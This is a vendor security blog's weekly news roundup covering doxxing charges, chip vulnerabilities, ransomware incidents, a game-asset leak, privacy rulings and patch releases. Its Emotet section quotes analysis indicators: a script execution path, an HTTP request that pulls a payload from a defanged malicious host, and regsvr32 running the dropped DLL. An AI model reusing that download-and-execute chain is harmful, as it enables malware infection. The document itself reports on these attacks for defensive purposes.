IT NEWS

A week in security (March 13 – 19)

Last week on Malwarebytes Labs:

Stay safe!


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

“ViLE” members posed as police officers and extorted victims

Two men have been charged with wire fraud and conspiracy to commit computer intrusions after they allegedly extorted victims by threatening to publish their personal information online—a practice known as doxxing.

In a press release, the US Attorney’s Office in the Eastern District of New York revealed details about the complaint against Sagar Steven Singh and Nicholas Ceraolo. Singh has been arrested but Ceraolo is still at large.

Singh and Ceraolo belonged to a group called Vile. Members of ViLE sought to collect victims’ personal information, such as names, physical addresses, telephone numbers, social security numbers, and email addresses. ViLE runs their own website which they use to post that information to unless the victim complies with their demands.

In order to get hold of the personal information, it’s alleged that Singh and Ceraolo unlawfully used a police officer’s stolen password to access a restricted database.

They used the police officer’s credentials to access the web portal maintained by a US federal law enforcement agency, whose purpose is to share intelligence from government databases with state and local law enforcement agencies. The database contained (among other data) detailed, nonpublic records of narcotics and currency seizures, as well as law enforcement intelligence reports. 

As stated by United States Attorney Peace:

“As alleged, the defendants shamed, intimidated and extorted others online. This Office will not tolerate those who impersonate law enforcement officers and misuse the public safety infrastructure that exists to protect our citizens.”

The two suspects are also charged with accessing the email account of a foreign law enforcement officer. They abused this access to defraud social media companies by making purported emergency requests for information about the companies’ users. For example, one of the defendants used an official email account to pose as a Bangladeshi police officer in communication with US-based social media platforms.

The same Bangladeshi police account was used to request data about the user of an online gaming platform. When caught, the defendents allegedly threatened to sell the platform’s information on the Dark Web. An associate posed as a US local police officer and sent a forged subpoena to one of the platform’s vendors, seeking registration details about their administrators.  The vendor did not provide the information.

Data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication. Where possible, use a FIDO2 2FA device. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as a vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Google reveals 18 chip vulnerabilities threatening mobile, wearables, vehicles

Google’s Project Zero is warning of multiple significant vulnerabilities found across many models of mobile devices including Samsung Galaxy, Google Pixel, Vivo, and several forms of wearable and vehicles using certain types of components.

Between late 2022 and early 2023, Project Zero reported 18 vulnerabilities in a chip powering those devices. Of those 18, a total of four vulnerabilities are tagged as “top-severity” which could allow for silent compromise over the network.

Which devices are affected?

The list of impacted technology is as follows:

  • Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12 and A04 series
  • Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series
  • The Pixel 6 and Pixel 7 series of devices from Google
  • Any vehicles that use the Exynos Auto T5123 chipset

The four most severe vulnerabilities could allow attackers to remotely compromise a device, with no physical interaction required at any stage of the proceedings. The only thing an attacker requires for the compromise to take place is knowledge of the intended victim’s phone number.

The other fourteen, while still bad, are nowhere near as severe, and for them to be successful requires either a malicious mobile network operator or an attacker with local access to the device.

Meanwhile, the Google Security research team believes that the most severe vulnerabilities would allow skilled attackers to create an operational exploit in a short space of time.

Patching and scope of threat

While Google mentions that patching will be dependent on manufacturer, PIxel phones (for example) have already been patched against CVE-2023-24033 in the March security update. If a patch isn’t forthcoming for your own device yet, Google has some suggestions to help keep your technology safe from harm. If your device allows you to, switch off two settings called:

  • Wi-Fi calling
  • Voice-over-LTE (VoLTE)

This will prevent the risk of exploitation. One potential ramification of disabling VoLTE is that in recent years it has become something of a necessity for some mobile networks. If you’re able to turn it off, then based on the information available you may experience poor call quality and lack of certain features and functionality. On the other hand, VoLTE is “not available everywhere on every network, or on every handset” so it may not matter too much anyway depending on your make and model.

As for scope, depending on where your device is from you may not be running the vulnerable type of chip needed for the exploit to be successful. The Verge notes that phones sold outside of Europe and some African countries” use something else altogether. In those instances, you should be fine.


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

LockBit ransomware attacks Essendant

The LockBit ransomware group is claiming responsibility for taking down a US-based distributor of office products called Essendant. This attack, which is said to have begun on or around March 6, created severe ramifications for the organisation, disrupting freight carrier pickups, online orders, and access to customer support.

As noted by Bleeping Computer, the original notification that something had gone wrong made no mention of ransomware or even any form of compromise. There’s still no mention on the updated notification page. However, this may be about to change in the wake of LockBit’s claims.

As with so many ransomware groups out there, LockBit is a fan of using stolen data to apply additional pressure and make victims pay the ransom. In cases where the payment is not made, the data is put up for sale, or simply posted online for free. This is a big leveraging factor on many businesses when deciding what to do about ransom threats.

On March 14, LockBit added Essendant to its leaks page with the threat of supposedly stolen data being published by March 18, if its demands are not met.

Essendent data on the LockBit data leak site

The description of the embattled organisation comes with the message “Change a recovery company and try again”. This could be a reference to previous failed attempts to decrypt the compromised data.

LockBit has demonstrated time and again that it will release stolen data if the target refuses to pay. Just last month, Royal Mail found itself on the wrong end of a data dump via the LockBit leak portal after a high profile ransomware attack caused all manner of postal delays.

Unusually, the Royal Mail data dump also came with a chat log of the entire conversation between LockBit and Royal Mail. The log is absolutely fascinating and illustrates the need for victims to employ someone who knows what they’re doing when negotiating with attackers.

LockBit is arguably the most dangerous malware in the world right now. It was by far the most dominant ransomware in 2022, and hasn’t slowed down in 2023, which is why it’s one of the five threats you can’t afford to ignore in our in our 2023 State of Malware report.

Chart of the most prevalent ransomware-as-a-service groups in 2022
Known attacks by the most prevalent ransomware groups in 2022

Its success comes from its professionalism. LockBit is run as a business: It has a slick website, it avoids the political grandstanding of its competitors, and even offers bug bounties to people who find flaws in its software. It distributes three different versions of its ransomware-as-a-service (RaaS), which are reportedly used by 100 affiliates, and its largest known ransom demand is $80 million.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Rubrik is latest victim of the Clop ransomware zero-day campaign

Rubrik, a cybersecurity company specializing in cloud data management, has revealed that some of its systems were infiltrated by the Clop ransomware group. Rubrik is one of many companies attacked by Clop via an infamous zero-day vulnerability in the GoAnywhere file transfer software.

The attack began in February, according to its CEO Michael Mestrovich. “We detected unauthorized access to a limited amount of information in one of our non-production IT testing environments as a result of the GoAnywhere vulnerability,” he says in a blog post published Tuesday. Mestrovich claims that “based on our current investigation, being conducted with the assistance of third-party forensics experts, the unauthorized access did NOT include any data we secure on behalf of our customers via any Rubrik products.”

He also revealed the attackers compromised internal sales data, including customer and partner company names, business contact information, and some purchase orders from Rubrik distributors. According to Mestrovich, the third-party investigators used by Rubrik confirmed that no personal information, such as Social Security Numbers (SSNs), financial accounts, and payment card numbers, were compromised.

The GoAnywhere vulnerability, tracked as CVE-2023-0669, has a severity rating of High and was included in CISA’s Known Exploited Vulnerabilities Catalog, a list of actively exploited vulnerabilities every federal information system must patch urgently. The catalog is an essential go-to list for IT admins trying to prioritize their patching.

The attack on Rubrik happened before an emergency patch was available.

Clop hasn’t been shy about the 130 organizations it’s stolen data from thanks to the GoAnywhere vulnerability. Last week, the gang began sending out extortion emails to the victims, and adding them to its leak site. Known victims include Rubrik, Hatch Bank and Community Health Systems (CHS).

Organizations using GoAnywhere should download the security patch immediately. Fortra has also provided a technical mitigation in its advisory, which can be accessed via the company’s customer portal.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Ransomware attack hits ANOTHER school

In what is likely Vice Society’s handiwork, the UK’s largest state boarding school Wymondham College has announced it has become the victim of a “sophisticated cyberattack”. The school didn’t provide additional information, but Jonathan Taylor, chief of the school’s parent company Sapientia Education Trust, has revealed the school is yet to receive a ransom note.

In an email to The Record, Taylor said:

“We are not aware of any data breach. A number of the College’s systems have been impacted, including access to some files and resources.” 

Taylor said the school remains open, saying the priority is “to ensure continuity of educational provision”. The Norwich Evening News reports disruption will likely continue until the Easter holidays as the attack targeted the College’s IT system.

Wymondham College is working with the National Cyber Security Centre (NCSC), the UK’s authority for cyber incidents, to ensure an appropriate response. Taylor says the Department of Education has also been notified.

The NCSC has warned the UK education sector about increasing targeted ransomware attacks toward schools, colleges, and universities. However, latest research from the London Grid for Learning (LGfL) reveals that only 53 percent of UK schools feel prepared for a cyberattack. 

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Hackers threaten to leak STALKER 2 assets if devs don’t heed demands

Ukrainian game developer GSC Game World has announced it was breached by Russian hacktivists who stole assets related to the much-awaited game STALKER 2: Heart of Chernobyl. 

According to GSC, the hacktivists accessed an employee’s image app account and stole STALKER 2’s full story, cut scenes, various concept art, global maps, and more. The company said these assets are being used for blackmail and intimidation.

“We have been enduring constant cyberattacks for more than a year now,” the GCS Game World Team said in its.

“We have faced blackmail, acts of aggression, attempts to hurt players and fans, and efforts to damage the development process of the reputation of our company.”

A group named Vestnik TSS has claimed responsibility and has given the devs an ultimatum: Do as we say, or we’ll leak all stolen STALKER 2 assets.

“Nick Frost”, a Vestnik TSS administrator, posted the group’s demands on the Russian social media site VK.com. Below is a screenshot of the English-translated post:

easset upload file66651 262406 e

Vestnik TSS wants GSC to apologize to players in Russia and Belarus for its perceived “unworthy attitude” towards them, un-ban certain Russian accounts on its official Discord server, and bring back the Russian localization of STALKER 2. The group gave the developers until March 15, Wednesday, to make these changes.

It appears, however, that Vestnik TSS leaked some files that they stole before yesterday’s deadline. The group’s VK page is awash with concept art, which includes an overview of mutant NPCs, bits of the game world’s map, and artifacts. On Tuesday, alias “Daniel Nexus”, likely another admin, posted more STALKER 2 assets archived and kept behind a password.

GSC Game World is yet to respond to the demands; and by the tone of its message, I suspect the developers have no intention of complying. Instead, the team has pleaded for the STALKER community to refrain from watching or distributing the leaked materials.

“Outdated and work-in-progress materials may dilute the impression of the final idea that we have put into the game. We encourage you to stay patient and wait for the official release for the best experience possible. We believe that you will love it.”


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Facebook illegally processed user data, says court

The Amsterdam court has ruled that Facebook illegally processed user data in a case started by the Dutch Data Privacy Stichting (DPS), a foundation that acts on behalf of victims of privacy violations in the Netherlands.

According to the ruling, Facebook used personal data for advertising purposes in the period April 1, 2010, to January 1, 2020, when this was not allowed. The same ruling also says that Facebook shared personal data with third parties without any legal basis to do so, and without informing the users themselves. Without properly informing users there can be no consent.

The DPS and the Dutch Consumentenbond—a consumers association with over 400,000 members—filed a class-action suit against Facebook Ireland, which is the European subsidiary of Meta that oversees the processing of Dutch user data. This ruling doesn’t mean damages can yet be claimed by the 185,000+ people that are represented in the class-action suit, but it’s one step closer. Based on this ruling, the group now hopes to sit down with Facebook to negotiate a settlement. Any of the roughly 10 million Dutch people who used Facebook during the relevant period can join if the case moves to a damages phase.

The main complaints were that Facebook used personal data for advertising and shared data like sexual preferences and religion with third parties. The data in question were both provided by the users themselves and derived by Facebook from the users’ browsing behavior outside of Facebook itself. Facebook not only shared users’ personal data with third parties but also the personal data of their Facebook friends.

Facebook was cleared of the complaint that it placed cookies on third party websites. The court ruled that it transferred the responsibility for those cookies to the website owners, and had the right to do so. Facebook was also cleared of enrichment charges as the court found not enough proof that Facebook’s monetary gain from these actions resulted in direct damages to the users.

A spokesperson for Meta said the company was “pleased” with parts of the decision but would appeal others, noting that some of the claims date back more than a decade.

Austria

In Austria, the Datenschutzbehörde (DSB) ruled that a complaint that Meta’s tracking pixels by the privacy organization noyb were conflicting with European GDPR rules was partially upheld. The website owner was found in conflict with GDPR regulations because personal data of users (at least unique user identification numbers, IP address and browser parameters) were transferred to the USA in a data transfer without ensuring an adequate level of protection.

Last year the Austrian privacy watchdog ruled against Google Analytics as being in conflict with GDPR regulations. According to noyb, the same rules apply to Facebook Login and Meta Pixel because these tools also send data to the US.

Together these rulings may have serious consequences for all European based website owners. Because of the transferred responsibility the website owners take on by using these tools, they can be held liable for the fact that Meta and Google send data to the US without ensuring an adequate level of protection.


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Emotet adopts Microsoft OneNote attachments

Last week, Emotet returned after a three month absence when the botnet Epoch 4 started sending out malicious emails with malicious Office macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.

Indeed, Microsoft has been rolling out its initiative of auto-blocking macros from downloaded documents since last summer. This has forced criminals to revisit how they want to deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet’s turn to follow along.

easset upload file72517 262451 e

The OneNote file is simple but yet effective at social engineering users with a fake notification stating that the document is protected. When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead.

This triggers Windows scripting engine (wscript.exe) to execute the following command:

%Temp%OneNote16.0NTclick.wsf"

The heavily obfuscated script retrieves the Emotet binary payload from a remote site

GET https://penshorn[.]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org

The file is saved as a DLL and executed via regsvr32.exe:

%Temp%OneNote16.0NTrad44657.tmp.dll"

Once installed on the system, Emotet will then communicate with its command and control servers to receive further instructions.

As Emotet ramps up its malspam distribution, users should be particularly careful of this threat which we featured in our 2023 State of Malware Report, as it serves as an entry point for other threat actors keen on dropping ransomware.

Malwarebytes customers are protected against this threat at several layers within its attack chain including web protection, malware blocking. Our EDR product also flags the whole sequence:

easset upload file79523 262451 e

Although Emotet has had vacations, retirements and even been taken down by authorities before, it continues to be a serious threat and highlights how social engineering attacks are so effective. While macros may soon be a thing of the past, we can see that threat actors can leverage a variety of popular business applications to achieve their end goal of gaining a foothold onto enterprise networks.

We will continue to monitor any new developments with Emotet to ensure our customers remain protected.


Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

Update now! Microsoft fixes two zero-day bugs

Microsoft, and other vendors, have released their monthly updates. In total Microsoft has fixed a total of 101 vulnerabilities for several titles (including Edge), with two of them being actively exploited zero-days. On top of that, Adobe has fixed an actively exploited vulnerability in ColdFusion.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs of the actively exploited vulnerabilities patched in these updates are:

CVE-2023-23397: a critical Microsoft Outlook Elevation of Privilege (EoP) vulnerability. External attackers could send specially crafted emails to cause a connection from the victim to an external UNC location of attackers’ control. This would leak the Net-NTLMv2 hash of the victim to the attacker who could then relay this to another service and authenticate as the victim. The mail would be triggered automatically when retrieved and processed by the Outlook client, which could result in exploitation even before the email is viewed in the Preview Pane.

This means this vulnerability could be used to obtain a hashed token, which could then be used in a so-called “pass-the-hash” attack.  Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then returns the result of this operation to the service. The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirm that the client’s response is correct, the service allows access to the client. Sounds secure, right? Well, the fun part is that with the hash you have enough information to perform that mathematical operation required to gain access. The authentication process does not require the plaintext password. The hash is enough.

CVE-2023-24880: a moderate Windows SmartScreen Security Feature Bypass vulnerability. An attacker could craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging. Reportedly, this vulnerability was used in ransomware related attacks.

MOTW, the technology that ensures Windows pops a warning message when trying to open a file downloaded from the Internet makes another comeback. The MOTW is an attribute added to files by Windows when they have been sourced from an untrusted location, like the internet or a Restricted Zone. When you download a file from the internet, Windows adds the zone identifier or Mark of the Web as an NTFS stream to the file. And, when you run the file, Windows SmartScreen checks if there is a zone identifier Alternate Data Stream (ADS) attached to the file. If the ADS indicates ZoneId=3, which means that the file was downloaded from the internet, the SmartScreen does a reputation check.

CVE-2023-26360: classified as a priority 1 vulnerability in Adobe ColdFusion due to critical deserialization of untrusted data. This flaw can lead to arbitrary code execution, making it a high-priority target for attackers.

Adobe says it is aware that CVE-2023-26360 has been exploited in the wild in very limited attacks targeting Adobe ColdFusion.

Adobe recommends updating your ColdFusion versions 2021 and 2018 JDK/JRE to the latest version of the LTS releases for JDK 11. Applying the ColdFusion update without a corresponding JDK update will NOT secure the server.

Adobe  also recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides.    

Other vendors

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

  • SAP has released security updates for 19 vulnerabilities, five of which were rated as critical.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW